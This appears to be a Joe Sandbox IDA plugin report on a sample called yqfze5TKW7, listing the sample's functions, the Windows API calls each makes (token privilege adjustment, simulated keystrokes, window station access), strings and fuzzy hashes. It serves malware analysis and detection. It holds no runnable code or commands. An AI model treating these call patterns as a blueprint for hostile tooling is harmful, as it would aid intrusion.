Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: f5ccb6a9162d5a74ba730537aa117b5e871d0e2a951bdaa10a96088bdf6baa96
Instruction ID: fde2532e344238b964aa39466cbd90e5d17ae6310b308cad7352aa22fa3b95d0
Opcode Fuzzy Hash: f5ccb6a9162d5a74ba730537aa117b5e871d0e2a951bdaa10a96088bdf6baa96
Instruction Fuzzy Hash: 14213374608711DFDB54DF64D444A5ABBE2BF88314F04896CF98A57722C731E805CF92

Function 00625BC0 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,006256A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00625C16

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0b96ee6b16b3ddc425c530ce32f49ab8cafc2d0a9462572b90190c2cdd07081a
Instruction ID: ff86fbb5692eb427cc95cfb5796b85b40a471a71f208bdf47859c12f7ec54f2c
Opcode Fuzzy Hash: 0b96ee6b16b3ddc425c530ce32f49ab8cafc2d0a9462572b90190c2cdd07081a
Instruction Fuzzy Hash: C3112875200F149FD3308F19D880BA2B7E6EB44761F10C92EE99B86A51D770E845CF60

Function 00625A7A Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0065DD18

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 9f3ded07322f352e8a10de6e5b29e511e5eed242f4c9ed39c3b1c7becfd31a48
Instruction ID: 1c630dd7f5c4bc3ca7b96a6e3dd6472bbb2512825a204925de90a725dfd2a669
Opcode Fuzzy Hash: 9f3ded07322f352e8a10de6e5b29e511e5eed242f4c9ed39c3b1c7becfd31a48
Instruction Fuzzy Hash: 7A01DFB4600912AFC301EB28D442C26F7AAFF8A310714816DF91AC7702DB31EC21CBE4

Function 00644863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 006448A6

Part of subcall function 00648B28: __getptd_noexit.LIBCMT ref: 00648B28

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: bb05233535a83c6bd24d326e55148122ed9878bb016c02bf2a3f248be5b24f09
Instruction ID: 076d10c39cd11088528951e08e20e253db08e3e84a3a002739031fac43c501bd
Opcode Fuzzy Hash: bb05233535a83c6bd24d326e55148122ed9878bb016c02bf2a3f248be5b24f09
Instruction Fuzzy Hash: B2F0AF31D01609EFDF91AFA48C067EE36A3AF01325F158418F424AB292CF79C951DB55

Function 00624E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,006E52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00624E7E

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: fd64f73aabe1eac26f939c94ba84d23ed9b8619f66e1dc2e93ac11e224bc71cd
Instruction ID: 0a4ecd472823315ae5927982e468e21f12039798be9e4d20454c24e19b6b1482
Opcode Fuzzy Hash: fd64f73aabe1eac26f939c94ba84d23ed9b8619f66e1dc2e93ac11e224bc71cd
Instruction Fuzzy Hash: 2BF03071505B22CFDB349F64E494852B7E2BF14325311893EE2D786611CB319840DF40

Function 00640791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006407B0

Part of subcall function 00627BCC: _memmove.LIBCMT ref: 00627C06

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 95a239556573a672e6cd437370dc0134c0ba770cf9a141992de6aca725ca25c5
Instruction ID: ec3adca7736c76c051c676f17afa0440b2cf29f78130f2671d94fee8b5c7c832
Opcode Fuzzy Hash: 95a239556573a672e6cd437370dc0134c0ba770cf9a141992de6aca725ca25c5
Instruction Fuzzy Hash: 8CE0CD369051285BC720E6989C05FEA77DEDFC97A2F0441B9FC4CD7254D9A0AD808AD5

Function 00688E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00688EC1

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction ID: 38e84488c2b2ab6ed4822b8426aaa1b0043ed3eb1cb7a577cc6985f5203754ad
Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction Fuzzy Hash: 5FE092B0104B045FD7389A24D800BE373E2AB05304F00091DF2AA93342EB6278418759

Function 016ADB90 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 016ADB9B

Memory Dump Source

Source File: 00000000.00000002.1513112394.00000000016AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16ad000_yqfze5TKW7.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction ID: ede9a77346e81139799d2cd5ea519b0e023fe41a3b2224c48cfc4d3fe78432fb
Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction Fuzzy Hash: D7E0C2B0A0520CEBDB20CBFCCC48AADB3A8D705320F804798E916C37C1D7308E419B54

Function 00625C4E Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,0065DD42,?,?,00000000), ref: 00625C5F

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e54caa023cbc0ffc7a32755d805f31654149e62f8247eb1a57cfe72f523b59ca
Instruction ID: 5aef83233dd8aa2055912dca56f174b9b680b2e171186e3d125df31d9dc81539
Opcode Fuzzy Hash: e54caa023cbc0ffc7a32755d805f31654149e62f8247eb1a57cfe72f523b59ca
Instruction Fuzzy Hash: 3ED0C77464020CBFE710DB80DC46FA977BDD705710F100194FD0456290D6B27D508B95

Function 016ADB60 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 016ADB6B

Memory Dump Source

Source File: 00000000.00000002.1513112394.00000000016AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16ad000_yqfze5TKW7.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction ID: efe4f2eae52976336cf9dd72b682a4bc39e5b6bdb3811cfdfef96b12eac8909d
Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction Fuzzy Hash: 2ED05EB090620CEBCB10CAE89C08A9A73A89705320F004754E91583280D6319D409B94

Function 0064525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00645266

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: fa004094fc970d5c6ddd0c2c4e7e8aa8d25aa75cacfbe6f1c0cf079ebec05a64
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: AEB0927644020C77CF012A82EC02A4A3B1A9B41764F408021FB0C18162A6B3A6649A89

Function 0068D07B Relevance: 1.4, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000002,00000000), ref: 0068D1FF

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 4d7e77617ac8e959edc81a4cf9a32ab75b63d6e9d36f42f5f131d72c636e2180
Instruction ID: 4c8eb94cd2654866cbf692f3f561e81fbdbbf1a36ac50e00d49cad76cae3835d
Opcode Fuzzy Hash: 4d7e77617ac8e959edc81a4cf9a32ab75b63d6e9d36f42f5f131d72c636e2180
Instruction Fuzzy Hash: DE7193306047118FC754EF24D491AAEB7E2AF89314F044A2DF9969B3A1DB30ED45CF66

Function 016AF5CC Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 016AF5E1

Memory Dump Source

Source File: 00000000.00000002.1513112394.00000000016AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16ad000_yqfze5TKW7.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: de1128c1baae3cbba95196c575522b316e0082437ce2d5cf818ec35bffbfeaed
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 4BE09A7494010EAFDB00EFA4D94969E7BB4EF04301F1005A1FD05D6681DA309E548A62

Function 016AF5D0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 016AF5E1

Memory Dump Source

Source File: 00000000.00000002.1513112394.00000000016AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16ad000_yqfze5TKW7.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 8ee4046d5899a5cf290a985d023f3ed4f8b5445319945bb249cfd6070ede3ebd
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: B9E0E67494010EDFDB00EFB4D94D69E7FB4EF04301F1001A1FD01D2281DA309E50CA62

Non-executed Functions

Function 006ACABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00622612: GetWindowLongW.USER32(?,000000EB), ref: 00622623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 006ACB37
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 006ACB95
GetWindowLongW.USER32(?,000000F0), ref: 006ACBD6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 006ACC00
SendMessageW.USER32 ref: 006ACC29
_wcsncpy.LIBCMT ref: 006ACC95
GetKeyState.USER32(00000011), ref: 006ACCB6
GetKeyState.USER32(00000009), ref: 006ACCC3
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 006ACCD9
GetKeyState.USER32(00000010), ref: 006ACCE3
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 006ACD0C
SendMessageW.USER32 ref: 006ACD33
SendMessageW.USER32(?,00001030,?,006AB348), ref: 006ACE37
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 006ACE4D
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 006ACE60
SetCapture.USER32(?), ref: 006ACE69
ClientToScreen.USER32(?,?), ref: 006ACECE
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 006ACEDB
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 006ACEF5
ReleaseCapture.USER32 ref: 006ACF00
GetCursorPos.USER32(?), ref: 006ACF3A
ScreenToClient.USER32(?,?), ref: 006ACF47
SendMessageW.USER32(?,00001012,00000000,?), ref: 006ACFA3
SendMessageW.USER32 ref: 006ACFD1
SendMessageW.USER32(?,00001111,00000000,?), ref: 006AD00E
SendMessageW.USER32 ref: 006AD03D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 006AD05E
SendMessageW.USER32(?,0000110B,00000009,?), ref: 006AD06D
GetCursorPos.USER32(?), ref: 006AD08D
ScreenToClient.USER32(?,?), ref: 006AD09A
GetParent.USER32(?), ref: 006AD0BA
SendMessageW.USER32(?,00001012,00000000,?), ref: 006AD123
SendMessageW.USER32 ref: 006AD154
ClientToScreen.USER32(?,?), ref: 006AD1B2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 006AD1E2
SendMessageW.USER32(?,00001111,00000000,?), ref: 006AD20C
SendMessageW.USER32 ref: 006AD22F
ClientToScreen.USER32(?,?), ref: 006AD281
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 006AD2B5

Part of subcall function 006225DB: GetWindowLongW.USER32(?,000000EB), ref: 006225EC

GetWindowLongW.USER32(?,000000F0), ref: 006AD351

Strings

F, xrefs: 006AD235
@GUI_DRAGID, xrefs: 006ACE9C
pbn, xrefs: 006ACEAF

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F$pbn
API String ID: 3977979337-2824976278
Opcode ID: 729e71e76269f4c326644509738e7cdcf9ac45f0fd92cbe5830d909d6d6cfaaf
Instruction ID: 986be0ccbf209f6b9b94e2b64cfdb6f8c4f5dcc7303815e5865f985e7a3633d0
Opcode Fuzzy Hash: 729e71e76269f4c326644509738e7cdcf9ac45f0fd92cbe5830d909d6d6cfaaf
Instruction Fuzzy Hash: 04429D34204741AFDB24EF64C894AAABBE6FF4A320F141559F556872A1C732EC50DFA2

Function 00636F9E Relevance: 55.8, APIs: 19, Strings: 10, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 006371C3
_memset.LIBCMT ref: 00637539
_memmove.LIBCMT ref: 006376AC

Strings

\b(?=\w), xrefs: 00673769
\b(?<=\w), xrefs: 00673773
_c, xrefs: 006723CB
Q\E, xrefs: 00637FCB
]m, xrefs: 00671A22
[:<:]], xrefs: 00637479
[:>:]], xrefs: 00637492
3cc, xrefs: 006723A0
P\m, xrefs: 00671AB8
DEFINE, xrefs: 00672103

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: _memmove$_memset
String ID: ]m$3cc$DEFINE$P\m$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_c
API String ID: 1357608183-245388162
Opcode ID: 36ee253df393f249322d5a2a75a45a124560239b6574e65f524b142246ffcbc3
Instruction ID: c18d6c14ba57446e736c93a3c20881fd5751ba1544ede8f95f41f7aa676efb82
Opcode Fuzzy Hash: 36ee253df393f249322d5a2a75a45a124560239b6574e65f524b142246ffcbc3
Instruction Fuzzy Hash: 37939471A04216DFDB24CF58C8917EDB7B2FF48710F25816AE959AB381E7709D82DB80

Function 006248D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 006248DF
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0065D665
IsIconic.USER32(?), ref: 0065D66E
ShowWindow.USER32(?,00000009), ref: 0065D67B
SetForegroundWindow.USER32(?), ref: 0065D685
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0065D69B
GetCurrentThreadId.KERNEL32 ref: 0065D6A2
GetWindowThreadProcessId.USER32(?,00000000), ref: 0065D6AE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0065D6BF
AttachThreadInput.USER32(?,00000000,00000001), ref: 0065D6C7
AttachThreadInput.USER32(00000000,?,00000001), ref: 0065D6CF
SetForegroundWindow.USER32(?), ref: 0065D6D2
MapVirtualKeyW.USER32(00000012,00000000), ref: 0065D6E7
keybd_event.USER32(00000012,00000000), ref: 0065D6F2
MapVirtualKeyW.USER32(00000012,00000000), ref: 0065D6FC
keybd_event.USER32(00000012,00000000), ref: 0065D701
MapVirtualKeyW.USER32(00000012,00000000), ref: 0065D70A
keybd_event.USER32(00000012,00000000), ref: 0065D70F
MapVirtualKeyW.USER32(00000012,00000000), ref: 0065D719
keybd_event.USER32(00000012,00000000), ref: 0065D71E
SetForegroundWindow.USER32(?), ref: 0065D721
AttachThreadInput.USER32(?,?,00000000), ref: 0065D748

Strings

Shell_TrayWnd, xrefs: 0065D660

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: bbf39c45ba901beb20547f0c7c846a14cfb11c12b8f02a13f7727376b2f17adf
Instruction ID: 87335f3673cc304410890a2259685392c2d2061225e1b65f9f76b75568c27818
Opcode Fuzzy Hash: bbf39c45ba901beb20547f0c7c846a14cfb11c12b8f02a13f7727376b2f17adf
Instruction Fuzzy Hash: 6A316271A40318BBEB306FA19C49FBF7E6EEB45B51F105025FA04EA1D1C6B06941AFA1

Function 00678310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 006787E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0067882B
Part of subcall function 006787E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00678858
Part of subcall function 006787E1: GetLastError.KERNEL32 ref: 00678865

_memset.LIBCMT ref: 00678353
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 006783A5
CloseHandle.KERNEL32(?), ref: 006783B6
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 006783CD
GetProcessWindowStation.USER32 ref: 006783E6
SetProcessWindowStation.USER32(00000000), ref: 006783F0
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0067840A

Part of subcall function 006781CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00678309), ref: 006781E0
Part of subcall function 006781CB: CloseHandle.KERNEL32(?,?,00678309), ref: 006781F2

Strings

default, xrefs: 00678405
, xrefs: 00678362
winsta0, xrefs: 006783C8

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 59fadf81dbccc8a783c17a33008320001c4751968e65794ab4bf174aa40153a8
Instruction ID: 0b506ad99e34dafd39b5c574f487c768c9764184b80038821145fe66cca81d2e
Opcode Fuzzy Hash: 59fadf81dbccc8a783c17a33008320001c4751968e65794ab4bf174aa40153a8
Instruction Fuzzy Hash: B6817C71940209AFEF51EFA4DC49AEE7BBAFF04304F148169F918A7261DB319E14DB21

Function 0068C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0068C78D
FindClose.KERNEL32(00000000), ref: 0068C7E1
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0068C806
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0068C81D
FileTimeToSystemTime.KERNEL32(?,?), ref: 0068C844
__swprintf.LIBCMT ref: 0068C890
__swprintf.LIBCMT ref: 0068C8D3

Part of subcall function 00627DE1: _memmove.LIBCMT ref: 00627E22

__swprintf.LIBCMT ref: 0068C927

Part of subcall function 00643698: __woutput_l.LIBCMT ref: 006436F1

__swprintf.LIBCMT ref: 0068C975

